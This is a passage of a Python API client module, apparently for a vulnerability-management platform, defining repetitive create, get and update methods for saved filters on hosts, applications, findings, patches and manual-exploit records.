:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.HOST_MANUAL_EXPLOIT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_network_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved network filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.NETWORK, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_patch_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved patch filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.PATCH, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_tag_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved tag filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.TAG, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_unique_appfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved unique application finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_unique_hostfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved unique host finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.UNIQUE_HOST_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_user_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved user filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.USER, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_filter(self, filter_subject, filter_id, client_id=None):
"""
Gets the details for a saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
        :type filter_subject: FilterSubject attribute
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
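
        Example (illustrative; the filter and client IDs are placeholders):

            >>> details = filters.get_filter(FilterSubject.TAG, filter_id=55, client_id=123)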
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject) + "/{}".format(str(filter_id))
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
def get_application_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved application filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_appfinding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved application finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_app_manual_exploit_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved application manual exploit filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_application_url_filter(self, filter_id, client_id=None):
"""
        Gets the details for a saved application URL filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION_URL, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_assessment_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved assessment filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.ASSESSMENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_client_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved client filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.CLIENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_database_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved database filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.DATABASE, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_databasefinding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved database finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.DATABASE_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_group_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved group filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.GROUP, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_host_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved host filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.HOST, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_hostfinding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved host finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_host_manual_exploit_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved host manual exploit filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.HOST_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_network_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved network filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.NETWORK, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_patch_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved patch filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.PATCH, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_tag_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved tag filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.TAG, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_unique_app_finding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved unique application finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_unique_host_finding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved unique host finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.UNIQUE_HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_user_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved user filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.USER, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def update(self, filter_subject, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
        :type filter_subject: FilterSubject attribute
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
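
        Example (illustrative; renames a saved filter and shares it while
        leaving its filter definition unchanged; the filter ID is a
        placeholder):

            >>> success = filters.update(
            ...     FilterSubject.HOST_FINDING,
            ...     filter_id=42,
            ...     name="Renamed filter",
            ...     shared=True
            ... )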
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
success = False
url = self.alt_api_base_url.format(str(client_id), filter_subject) + "/{}".format(str(filter_id))
name = kwargs.get("name", None)
filter_definition = kwargs.get("filter_definition", None)
shared = kwargs.get("shared", None)
body = {
"name": name,
"filters": filter_definition,
"shared": shared
}
body = self._strip_nones_from_dict(body)
if body == {}:
raise ValueError("Body is empty. Please provide name, filter_definition, and/or shared")
try:
self.request_handler.make_request(ApiRequestHandler.PUT, url, body=body)
        except (RequestFailed, StatusCodeError, MaxRetryError):
            # Re-raise so callers receive the documented exceptions instead of
            # having request errors silently swallowed as a False return.
            raise
success = True
return success
def update_application_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved application filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_appfinding_filter(self, filter_id, client_id=None, **kwargs):
"""
        Updates an existing saved application finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_app_manual_exploit_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved application manual exploit filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_application_url_filter(self, filter_id, client_id=None, **kwargs):
"""
        Updates an existing saved application URL filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION_URL, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_assessment_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved assessment filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.ASSESSMENT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_client_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved client filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.CLIENT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_database_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved database filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.DATABASE, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_databasefinding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved database finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.DATABASE_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_group_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved group filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.GROUP, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_host_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved host filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.HOST, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_hostfinding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved host finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.HOST_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_host_manual_exploit_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved host manual exploit filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.HOST_MANUAL_EXPLOIT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_network_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved network filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.NETWORK, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_patch_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved patch filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.PATCH, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_tag_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved tag filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.TAG, filter_id, client_id, **kwargs)
